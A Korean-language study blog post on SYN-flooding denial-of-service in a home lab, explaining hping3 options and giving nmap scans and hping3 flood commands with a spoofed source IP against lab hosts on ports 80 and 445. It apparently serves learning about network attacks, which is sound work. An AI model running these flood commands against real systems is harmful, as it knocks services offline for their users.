네트워크 보안 - DoS-SYN Flooding

안녕하세요~ 지방토끼입니다.

오늘은 네트워크 보안 DoS-SYN Flooding에 대해서 공부해 보려고 합니다!

그럼 시작해 볼까요?

 

Kali IP : 192.168.15.100

Linux IP : 192.168.15.101

Windows IP : 192.168.15.102

 

DoS

- 서비스 거부 공격

- 자원을 고갈시키는 공격

 

(공격)

- Network : 대역폭 고갈

- System : CPU, Memory, Disk, Process 자원 고갈

 

(명령어)

# hping3 [옵션] [공격 대상]

 

(옵션)

-c : 패킷 수 지정

-d : 데이터 크기

--flood : 최고의 속도로 최대 생성

--fast : 초당 10 패킷

--faster : 초당 100 패킷

 

(IP 옵션)

-a : 출발지 IP 주소 변조

--rand-dest : 랜덤 목적지 IP 주소 변조

--rand-source : 랜덤 출발지 IP 주소 변조

 

(UDP/TCP 옵션)

-s : 출발지 포트 지정

-p : 목적지 포트 지정

-S : SYN flag

-F : FIN flag

-P : PSH flag

-A : ACK flag

-R : RST flag

-U : URG flag

-X : X-mas flag (0x40)

-M : TCP Sequence number

 

(모드 옵션)

기본값 : TCP 모드

-0 : IP 모드

-1 : ICMP 모드

-2 : UDP 모드

-8 : Scan 모드

 

 

SYN Flooding

- SYN 패킷을 최대로 생성해서 최고의 속도로 전송 (시스템 자원 고갈)

- SYN 패킷으로 BackLog를 채워서 비우지 못하도록 만듬

- TCP 연결과정(3Way Handshake)에서 취약점을 이용하여 공격

(SYN + ACK를 받고 나서 ACK를 일부러 보내지 않으면 서버는 계속 응답을 받을 때까지 기다리게 된다.)

 

 

1. 포트 스캔(Kali)

# nmap 192.168.15.101

 

 

 

2. SYN Flooding(Kali)

# hping3 -a 100.100.100.100 192.168.15.101 -S -p 80 —flood

- 출발지 IP 100.100.100.100으로 변조, SYN flag, 목적지 포트 80, 최고의 속도로 최대 생성

 

 

 

3. wireshar & 시스템 정보 확인(Linux)

# wireshark &

# gnome-system-monitor

 

 

 

4. 네트워크 상태 확인(Linux)

# netstat –tuna

 

 

 

5. 포트 스캔(Kali)

# nmap 192.168.15.102

 

 

6. SYN Flooding(Kali)

# hping3 -a 100.100.100.100 192.168.15.102 -S -p 445 --flood

- 출발지 IP 100.100.100.100으로 변조, SYN flag, 목적지 포트 445, 최고의 속도로 최대 생성

 

 

 

7. 네트워크 상태 확인(Windows)

> netstat –an

 

 

 

8. SYN Flooding(Kali)

# hping3 -a 100.100.100.100 192.168.15.101 -S -p 80 -c 10

- 출발지 IP 100.100.100.100으로 변조, SYN flag, 목적지 포트 80, 패킷 수 10

 

 

 

# hping3 -a 100.100.100.100 192.168.15.101 -S -p 80 --fast

- 출발지 IP 100.100.100.100으로 변조, SYN flag, 목적지 포트 80, 초당 10 패킷

 

# hping3 -a 100.100.100.100 192.168.15.101 -S -p 80 --faster

- 출발지 IP 100.100.100.100으로 변조, SYN flag, 목적지 포트 80, 초당 100 패킷

 

 

 

 

 

 

 

 

 

 

.

.

.

.

.

.

 

오늘은 네트워크 보안 DoS-SYN Flooding에 대해서 공부해 보았습니다.!

읽어주셔서 감사합니다!

나쁜 용도로 쓰시면 안돼요!!

틀린 내용이나 부족한 부분이 있다면 댓글 부탁드려용!